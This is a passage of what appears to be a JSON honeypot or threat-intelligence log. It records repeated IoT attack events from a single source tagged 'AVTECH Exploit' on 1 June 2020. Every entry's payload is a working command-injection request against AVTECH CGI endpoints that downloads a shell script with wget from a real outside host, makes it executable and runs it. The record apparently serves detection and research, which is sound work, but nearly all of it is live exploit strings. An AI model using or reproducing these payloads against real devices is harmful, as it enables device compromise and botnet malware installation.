6074.       "protocol": "tcp",
6075.       "tags": [
6076.         {
6077.           "cve": "",
6078.           "category": "IoT",
6079.           "description": "AVTECH Exploit"
6080.         }
6081.       ],
6082.       "event_count": 1,
6083.       "first_seen": "2020-06-01T04:21:32Z",
6084.       "last_seen": "2020-06-01T04:21:32Z"
6085.     },
6086.     {
6087.       "event_id": "f5816f8b4bada95476db1368177ced095db7c5bf396d74e06087c13829cc5669",
6088.       "source_ip_address": "35.193.32.21",
6089.       "country": "US",
6090.       "user_agent": "Snickers-Avtech",
6091.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6092.       "post_data": "",
6093.       "target_port": 8123,
6094.       "protocol": "tcp",
6095.       "tags": [
6096.         {
6097.           "cve": "",
6098.           "category": "IoT",
6099.           "description": "AVTECH Exploit"
6100.         }
6101.       ],
6102.       "event_count": 1,
6103.       "first_seen": "2020-06-01T04:21:29Z",
6104.       "last_seen": "2020-06-01T04:21:29Z"
6105.     },
6106.     {
6107.       "event_id": "ac29d7cc78e675c336ec5aead32f06e2a064636a2b413b2e48d9614cc5deebc4",
6108.       "source_ip_address": "35.193.32.21",
6109.       "country": "US",
6110.       "user_agent": "Snickers-Avtech",
6111.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6112.       "post_data": "",
6113.       "target_port": 52869,
6114.       "protocol": "tcp",
6115.       "tags": [
6116.         {
6117.           "cve": "",
6118.           "category": "IoT",
6119.           "description": "AVTECH Exploit"
6120.         }
6121.       ],
6122.       "event_count": 1,
6123.       "first_seen": "2020-06-01T04:21:26Z",
6124.       "last_seen": "2020-06-01T04:21:26Z"
6125.     },
6126.     {
6127.       "event_id": "f5dff0a8f6419799ad8075fee58c083cb70a4a59b69854c63a5a0580aa8423b1",
6128.       "source_ip_address": "35.193.32.21",
6129.       "country": "US",
6130.       "user_agent": "Snickers-Avtech",
6131.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6132.       "post_data": "",
6133.       "target_port": 2087,
6134.       "protocol": "tcp",
6135.       "tags": [
6136.         {
6137.           "cve": "",
6138.           "category": "IoT",
6139.           "description": "AVTECH Exploit"
6140.         }
6141.       ],
6142.       "event_count": 1,
6143.       "first_seen": "2020-06-01T04:21:22Z",
6144.       "last_seen": "2020-06-01T04:21:22Z"
6145.     },
6146.     {
6147.       "event_id": "e3dbc4e5ae1eebea11d57686a7e64d8d40c53037de897a34021d8b11d36e59b2",
6148.       "source_ip_address": "35.193.32.21",
6149.       "country": "US",
6150.       "user_agent": "Snickers-Avtech",
6151.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6152.       "post_data": "",
6153.       "target_port": 2087,
6154.       "protocol": "tcp",
6155.       "tags": [
6156.         {
6157.           "cve": "",
6158.           "category": "IoT",
6159.           "description": "AVTECH Exploit"
6160.         }
6161.       ],
6162.       "event_count": 1,
6163.       "first_seen": "2020-06-01T04:21:20Z",
6164.       "last_seen": "2020-06-01T04:21:20Z"
6165.     },
6166.     {
6167.       "event_id": "624b5ab0b5641bb6b60953cee69582acfea092889b0d2c04b8da78e65cf00625",
6168.       "source_ip_address": "35.193.32.21",
6169.       "country": "US",
6170.       "user_agent": "Snickers-Avtech",
6171.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6172.       "post_data": "",
6173.       "target_port": 8139,
6174.       "protocol": "tcp",
6175.       "tags": [
6176.         {
6177.           "cve": "",
6178.           "category": "IoT",
6179.           "description": "AVTECH Exploit"
6180.         }
6181.       ],
6182.       "event_count": 1,
6183.       "first_seen": "2020-06-01T04:19:22Z",
6184.       "last_seen": "2020-06-01T04:19:22Z"
6185.     },
6186.     {
6187.       "event_id": "8f6dfa874abf5cebbdb4539197852525b3fa7672057a262e3ec85a1817ace347",
6188.       "source_ip_address": "35.193.32.21",
6189.       "country": "US",
6190.       "user_agent": "Snickers-Avtech",
6191.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6192.       "post_data": "",
6193.       "target_port": 8000,
6194.       "protocol": "tcp",
6195.       "tags": [
6196.         {
6197.           "cve": "",
6198.           "category": "IoT",
6199.           "description": "AVTECH Exploit"
6200.         }
6201.       ],
6202.       "event_count": 1,
6203.       "first_seen": "2020-06-01T04:19:20Z",
6204.       "last_seen": "2020-06-01T04:19:20Z"
6205.     },
6206.     {
6207.       "event_id": "ef6881e9975035924d180c9348189a87776a6b6eb285dd206ba2c872d83916bf",
6208.       "source_ip_address": "35.193.32.21",
6209.       "country": "US",
6210.       "user_agent": "Snickers-Avtech",
6211.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6212.       "post_data": "",
6213.       "target_port": 8139,
6214.       "protocol": "tcp",
6215.       "tags": [
6216.         {
6217.           "cve": "",
6218.           "category": "IoT",
6219.           "description": "AVTECH Exploit"
6220.         }
6221.       ],
6222.       "event_count": 1,
6223.       "first_seen": "2020-06-01T04:19:19Z",
6224.       "last_seen": "2020-06-01T04:19:19Z"
6225.     },
6226.     {
6227.       "event_id": "285a26a1da21d8ea34f2c708a9b48ab358a741150d9eb243e73cd90cac1e5099",
6228.       "source_ip_address": "35.193.32.21",
6229.       "country": "US",
6230.       "user_agent": "Snickers-Avtech",
6231.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6232.       "post_data": "",
6233.       "target_port": 9000,
6234.       "protocol": "tcp",
6235.       "tags": [
6236.         {
6237.           "cve": "",
6238.           "category": "IoT",
6239.           "description": "AVTECH Exploit"
6240.         }
6241.       ],
6242.       "event_count": 1,
6243.       "first_seen": "2020-06-01T04:19:16Z",
6244.       "last_seen": "2020-06-01T04:19:16Z"
6245.     },
6246.     {
6247.       "event_id": "27af4087b754cd39c2510db31f312439724b8f36a3daeb858312958549acda79",
6248.       "source_ip_address": "35.193.32.21",
6249.       "country": "US",
6250.       "user_agent": "Snickers-Avtech",
6251.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6252.       "post_data": "",
6253.       "target_port": 9000,
6254.       "protocol": "tcp",
6255.       "tags": [
6256.         {
6257.           "cve": "",
6258.           "category": "IoT",
6259.           "description": "AVTECH Exploit"
6260.         }
6261.       ],
6262.       "event_count": 1,
6263.       "first_seen": "2020-06-01T04:19:14Z",
6264.       "last_seen": "2020-06-01T04:19:14Z"
6265.     },
6266.     {
6267.       "event_id": "2b66049c68080d811edfa133a788b0f2c48674906023e9ef046d83e729a951c2",
6268.       "source_ip_address": "35.193.32.21",
6269.       "country": "US",
6270.       "user_agent": "Snickers-Avtech",
6271.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6272.       "post_data": "",
6273.       "target_port": 7547,
6274.       "protocol": "tcp",
6275.       "tags": [
6276.         {
6277.           "cve": "",
6278.           "category": "IoT",
6279.           "description": "AVTECH Exploit"
6280.         }
6281.       ],
6282.       "event_count": 1,
6283.       "first_seen": "2020-06-01T04:19:13Z",
6284.       "last_seen": "2020-06-01T04:19:13Z"
6285.     },
6286.     {
6287.       "event_id": "364b388dd05b14c1e519a85206b8767582211e6469f633ce4afc590f30bc04ca",
6288.       "source_ip_address": "35.193.32.21",
6289.       "country": "US",
6290.       "user_agent": "Snickers-Avtech",
6291.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6292.       "post_data": "",
6293.       "target_port": 7001,
6294.       "protocol": "tcp",
6295.       "tags": [
6296.         {
6297.           "cve": "",
6298.           "category": "IoT",
6299.           "description": "AVTECH Exploit"
6300.         }
6301.       ],
6302.       "event_count": 1,
6303.       "first_seen": "2020-06-01T04:19:12Z",
6304.       "last_seen": "2020-06-01T04:19:12Z"
6305.     },
6306.     {
6307.       "event_id": "768ad42097e07244256196f9ee88fde2e8ec3cc98327cf51dbb7a0e8594d9fb4",
6308.       "source_ip_address": "35.193.32.21",
6309.       "country": "US",
6310.       "user_agent": "Snickers-Avtech",
6311.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6312.       "post_data": "",
6313.       "target_port": 7547,
6314.       "protocol": "tcp",
6315.       "tags": [
6316.         {
6317.           "cve": "",
6318.           "category": "IoT",
6319.           "description": "AVTECH Exploit"
6320.         }
6321.       ],
6322.       "event_count": 1,
6323.       "first_seen": "2020-06-01T04:19:11Z",
6324.       "last_seen": "2020-06-01T04:19:11Z"
6325.     },
6326.     {
6327.       "event_id": "6b6648e992f997195df875762c3e1e2c7bf018b21ef295bf953465312512a9b7",
6328.       "source_ip_address": "35.193.32.21",
6329.       "country": "US",
6330.       "user_agent": "Snickers-Avtech",
6331.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6332.       "post_data": "",
6333.       "target_port": 7001,
6334.       "protocol": "tcp",
6335.       "tags": [
6336.         {
6337.           "cve": "",
6338.           "category": "IoT",
6339.           "description": "AVTECH Exploit"
6340.         }
6341.       ],
6342.       "event_count": 1,
6343.       "first_seen": "2020-06-01T04:19:10Z",
6344.       "last_seen": "2020-06-01T04:19:10Z"
6345.     },
6346.     {
6347.       "event_id": "b61a681aa884645e38b76b547f1fff1b994dc3b95f9d947414f6a83d6106fe47",
6348.       "source_ip_address": "35.193.32.21",
6349.       "country": "US",
6350.       "user_agent": "Snickers-Avtech",
6351.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6352.       "post_data": "",
6353.       "target_port": 8291,
6354.       "protocol": "tcp",
6355.       "tags": [
6356.         {
6357.           "cve": "",
6358.           "category": "IoT",
6359.           "description": "AVTECH Exploit"
6360.         }
6361.       ],
6362.       "event_count": 1,
6363.       "first_seen": "2020-06-01T04:18:48Z",
6364.       "last_seen": "2020-06-01T04:18:48Z"
6365.     },
6366.     {
6367.       "event_id": "196dea2c8552e0ac5d4431df53ded89031a68a962f3d95632e8e7ba5644a0cab",
6368.       "source_ip_address": "35.193.32.21",
6369.       "country": "US",
6370.       "user_agent": "Snickers-Avtech",
6371.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6372.       "post_data": "",
6373.       "target_port": 8291,
6374.       "protocol": "tcp",
6375.       "tags": [
6376.         {
6377.           "cve": "",
6378.           "category": "IoT",
6379.           "description": "AVTECH Exploit"
6380.         }
6381.       ],
6382.       "event_count": 1,
6383.       "first_seen": "2020-06-01T04:18:46Z",
6384.       "last_seen": "2020-06-01T04:18:46Z"
6385.     },
6386.     {
6387.       "event_id": "ac8c0f16d363c5288319859e0e0c5d3cd566f10573b2f5b24c970d30702416a1",
6388.       "source_ip_address": "35.193.32.21",
6389.       "country": "US",
6390.       "user_agent": "Snickers-Avtech",
6391.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
6392.       "post_data": "",
6393.       "target_port": 8888,
6394.       "protocol": "tcp",
6395.       "tags": [
6396.         {
6397.           "cve": "",
6398.           "category": "IoT",
6399.           "description": "AVTECH Exploit"
6400.         }
6401.       ],
6402.       "event_count": 1,
6403.       "first_seen": "2020-06-01T04:18:40Z",
6404.       "last_seen": "2020-06-01T04:18:40Z"
6405.     },
6406.     {
6407.       "event_id": "bbc3a7de7433d0452949589a2b6e2bcdb1f0e292913970bae6380610259eecb0",
6408.       "source_ip_address": "35.193.32.21",
6409.       "country": "US",
6410.       "user_agent": "Snickers-Avtech",
6411.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
6412.       "post_data": "",
6413.       "target_port": 8888,
6414.       "protocol": "tcp",
6415.       "tags": [
6416.         {
6417.           "cve": "",
6418.           "category": "IoT",
6419.           "description": "AVTECH Exploit"
6420.         }
6421.       ],
6422.       "event_count": 1,
6423.       "first_seen": "2020-06-01T04:18:38Z",
6424.       "last_seen": "2020-06-01T04:18:38Z"
6425.     },
6426.     {
6427.       "event_id": "974189c1569e0dc64ec072c2ad8dbafae0ad18c765e1332000c291fe1a9e77bc",
6428.       "source_ip_address": "35.193.32.21",
6429.       "country": "US",
6430.       "user_agent": "Snickers-Avtech",
6431.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
6432.       "post_data": "",
6433.       "target_port": 9002,
6434.       "protocol": "tcp",
6435.       "tags": [
6436.         {
6437.           "cve": "",
6438.           "category": "IoT",
6439.           "description": "AVTECH Exploit"
6440.         }
6441.       ],
6442.       "event_count": 1,
6443.       "first_seen": "2020-06-01T04:17:20Z",
6444.       "last_seen": "2020-06-01T04:17:20Z"
6445.     },
6446.     {
6447.       "event_id": "940f9a6bde4ab72c5392db74a43f5ff4e70f6a44be0e3468a82eab34b3a44b27",
6448.       "source_ip_address": "35.193.32.21",
6449.       "country": "US",
6450.       "user_agent": "Snickers-Avtech",
6451.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
6452.       "post_data": "",
6453.       "target_port": 7001,
6454.       "protocol": "tcp",
6455.       "tags": [
6456.         {
6457.           "cve": "",
6458.           "category": "IoT",
6459.           "description": "AVTECH Exploit"
6460.         }
6461.       ],
6462.       "event_count": 1,
6463.       "first_seen": "2020-06-01T04:17:18Z",
6464.       "last_seen": "2020-06-01T04:17:18Z"
6465.     },
6466.     {
6467.       "event_id": "08e0136041210d742a4066b7a3d237579a0e8ef91aa3183a640ea02594b413e8",
6468.       "source_ip_address": "35.193.32.21",
6469.       "country": "US",
6470.       "user_agent": "Snickers-Avtech",
6471.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
6472.       "post_data": "",
6473.       "target_port": 9002,
6474.       "protocol": "tcp",
6475.       "tags": [
6476.         {
6477.           "cve": "",
6478.           "category": "IoT",
6479.           "description": "AVTECH Exploit"
6480.         }
6481.       ],
6482.       "event_count": 1,
6483.       "first_seen": "2020-06-01T04:17:18Z",
6484.       "last_seen": "2020-06-01T04:17:18Z"
6485.     },
6486.     {
6487.       "event_id": "40616e4815868fadf8edabd3066772aefe890a604082e25cf13597c6f939c289",
6488.       "source_ip_address": "35.193.32.21",
6489.       "country": "US",
6490.       "user_agent": "Snickers-Avtech",
6491.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
6492.       "post_data": "",
6493.       "target_port": 9200,
6494.       "protocol": "tcp",
6495.       "tags": [
6496.         {
6497.           "cve": "",
6498.           "category": "IoT",
6499.           "description": "AVTECH Exploit"
6500.         }
6501.       ],
6502.       "event_count": 1,
6503.       "first_seen": "2020-06-01T04:17:16Z",
6504.       "last_seen": "2020-06-01T04:17:16Z"
6505.     },
6506.     {
6507.       "event_id": "b8e6b924123f674020f74906be7f3504b4960beb99cccf323bedefef5e52376e",
6508.       "source_ip_address": "35.193.32.21",
6509.       "country": "US",
6510.       "user_agent": "Snickers-Avtech",
6511.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
6512.       "post_data": "",
6513.       "target_port": 7001,
6514.       "protocol": "tcp",
6515.       "tags": [
6516.         {
6517.           "cve": "",
6518.           "category": "IoT",
6519.           "description": "AVTECH Exploit"
6520.         }
6521.       ],
6522.       "event_count": 1,
6523.       "first_seen": "2020-06-01T04:17:16Z",
6524.       "last_seen": "2020-06-01T04:17:16Z"
6525.     },
6526.     {
6527.       "event_id": "add11e7c9bbbfb10e752fed7c51878ea34a54bf2328bffd72ad6fb9fd3134bc0",
6528.       "source_ip_address": "35.193.32.21",
6529.       "country": "US",
6530.       "user_agent": "Snickers-Avtech",
6531.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
6532.       "post_data": "",
6533.       "target_port": 9200,
6534.       "protocol": "tcp",
6535.       "tags": [
6536.         {
6537.           "cve": "",
6538.           "category": "IoT",
6539.           "description": "AVTECH Exploit"
6540.         }
6541.       ],
6542.       "event_count": 1,
6543.       "first_seen": "2020-06-01T04:17:13Z",
6544.       "last_seen": "2020-06-01T04:17:13Z"
6545.     },
6546.     {
6547.       "event_id": "1177d7a922c27f3fe0803d31d22ac5931d9fba3d554a6a153c4dca0cece3f898",
6548.       "source_ip_address": "35.193.32.21",
6549.       "country": "US",
6550.       "user_agent": "Snickers-Avtech",
6551.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
6552.       "post_data": "",
6553.       "target_port": 8443,
6554.       "protocol": "tcp",
6555.       "tags": [
6556.         {
6557.           "cve": "",
6558.           "category": "IoT",
6559.           "description": "AVTECH Exploit"
6560.         }
6561.       ],
6562.       "event_count": 1,
6563.       "first_seen": "2020-06-01T04:16:51Z",
6564.       "last_seen": "2020-06-01T04:16:51Z"
6565.     },
6566.     {
6567.       "event_id": "c3145d0943e61236d3fd476c0708c60a0c16fe38aea1fb2138b65e79d90034bb",
6568.       "source_ip_address": "35.193.32.21",
6569.       "country": "US",
6570.       "user_agent": "Snickers-Avtech",
6571.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
6572.       "post_data": "",
6573.       "target_port": 8443,
6574.       "protocol": "tcp",
6575.       "tags": [
6576.         {
6577.           "cve": "",
6578.           "category": "IoT",
6579.           "description": "AVTECH Exploit"
6580.         }
6581.       ],
6582.       "event_count": 1,
6583.       "first_seen": "2020-06-01T04:16:49Z",
6584.       "last_seen": "2020-06-01T04:16:49Z"
6585.     },
6586.     {
6587.       "event_id": "cfb75e22980f875aec783a481834581c0f6fb112a361b72c9b98072dc59b5b7e",
6588.       "source_ip_address": "35.193.32.21",
6589.       "country": "US",
6590.       "user_agent": "Snickers-Avtech",
6591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6592.       "post_data": "",
6593.       "target_port": 50000,
6594.       "protocol": "tcp",
6595.       "tags": [
6596.         {
6597.           "cve": "",
6598.           "category": "IoT",
6599.           "description": "AVTECH Exploit"
6600.         }
6601.       ],
6602.       "event_count": 1,
6603.       "first_seen": "2020-06-01T01:16:15Z",
6604.       "last_seen": "2020-06-01T01:16:15Z"
6605.     },
6606.     {
6607.       "event_id": "636c4b99eb6d3d519154fc5e47afe069476081af460a76daa8cd4d5344a03aee",
6608.       "source_ip_address": "35.193.32.21",
6609.       "country": "US",
6610.       "user_agent": "Snickers-Avtech",
6611.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
6612.       "post_data": "",
6613.       "target_port": 4369,
6614.       "protocol": "tcp",
6615.       "tags": [
6616.         {
6617.           "cve": "",
6618.           "category": "IoT",
6619.           "description": "AVTECH Exploit"
6620.         }
6621.       ],
6622.       "event_count": 1,
6623.       "first_seen": "2020-06-01T01:16:10Z",
6624.       "last_seen": "2020-06-01T01:16:10Z"
6625.     },
6626.     {
6627.       "event_id": "f1f6a592a01d8cc77bc7499334212a16a860236e1e2a862f4c4409d1e0b9b4f1",
6628.       "source_ip_address": "35.193.32.21",
6629.       "country": "US",
6630.       "user_agent": "Snickers-Avtech",
6631.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6632.       "post_data": "",
6633.       "target_port": 4369,
6634.       "protocol": "tcp",
6635.       "tags": [
6636.         {
6637.           "cve": "",
6638.           "category": "IoT",
6639.           "description": "AVTECH Exploit"
6640.         }
6641.       ],
6642.       "event_count": 1,
6643.       "first_seen": "2020-06-01T01:16:07Z",
6644.       "last_seen": "2020-06-01T01:16:07Z"
6645.     },
6646.     {
6647.       "event_id": "6637d392f18ecaa127c92ba0ac739b2d4657a037af0693733bda9f08f864211b",
6648.       "source_ip_address": "35.193.32.21",
6649.       "country": "US",
6650.       "user_agent": "Snickers-Avtech",
6651.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
6652.       "post_data": "",
6653.       "target_port": 3791,
6654.       "protocol": "tcp",
6655.       "tags": [
6656.         {
6657.           "cve": "",
6658.           "category": "IoT",
6659.           "description": "AVTECH Exploit"
6660.         }
6661.       ],
6662.       "event_count": 1,
6663.       "first_seen": "2020-06-01T01:14:07Z",
6664.       "last_seen": "2020-06-01T01:14:07Z"
6665.     },
6666.     {
6667.       "event_id": "67d420fe432a89deb88fb2d7e6b5788a3159430a95319d3236fa0aa34f1de8a6",
6668.       "source_ip_address": "35.193.32.21",
6669.       "country": "US",
6670.       "user_agent": "Snickers-Avtech",
6671.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6672.       "post_data": "",
6673.       "target_port": 3791,
6674.       "protocol": "tcp",
6675.       "tags": [
6676.         {
6677.           "cve": "",
6678.           "category": "IoT",
6679.           "description": "AVTECH Exploit"
6680.         }
6681.       ],
6682.       "event_count": 1,
6683.       "first_seen": "2020-06-01T01:14:04Z",
6684.       "last_seen": "2020-06-01T01:14:04Z"
6685.     },
6686.     {
6687.       "event_id": "1fe27e9e8c0e5ed284b12066583b35e62f668fce986fd3e75bf79415fb24521d",
6688.       "source_ip_address": "35.193.32.21",
6689.       "country": "US",
6690.       "user_agent": "Snickers-Avtech",
6691.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6692.       "post_data": "",
6693.       "target_port": 8112,
6694.       "protocol": "tcp",
6695.       "tags": [
6696.         {
6697.           "cve": "",
6698.           "category": "IoT",
6699.           "description": "AVTECH Exploit"
6700.         }
6701.       ],
6702.       "event_count": 1,
6703.       "first_seen": "2020-06-01T01:13:10Z",
6704.       "last_seen": "2020-06-01T01:13:10Z"
6705.     },
6706.     {
6707.       "event_id": "8690757f70d299dd5a7128974900ea763941bf066243de4955a3a50f9fa7acb7",
6708.       "source_ip_address": "35.193.32.21",
6709.       "country": "US",
6710.       "user_agent": "Snickers-Avtech",
6711.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
6712.       "post_data": "",
6713.       "target_port": 8090,
6714.       "protocol": "tcp",
6715.       "tags": [
6716.         {
6717.           "cve": "",
6718.           "category": "IoT",
6719.           "description": "AVTECH Exploit"
6720.         }
6721.       ],
6722.       "event_count": 2,
6723.       "first_seen": "2020-06-01T01:11:52Z",
6724.       "last_seen": "2020-06-01T01:11:54Z"
6725.     },
6726.     {
6727.       "event_id": "f37a039a94d7553b9686edd1c567c4438b218c00c86f0ff93c1bda89d16d1147",
6728.       "source_ip_address": "35.193.32.21",
6729.       "country": "US",
6730.       "user_agent": "Snickers-Avtech",
6731.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
6732.       "post_data": "",
6733.       "target_port": 8090,
6734.       "protocol": "tcp",
6735.       "tags": [
6736.         {
6737.           "cve": "",
6738.           "category": "IoT",
6739.           "description": "AVTECH Exploit"
6740.         }
6741.       ],
6742.       "event_count": 2,
6743.       "first_seen": "2020-06-01T01:11:49Z",
6744.       "last_seen": "2020-06-01T01:11:51Z"
6745.     },
6746.     {
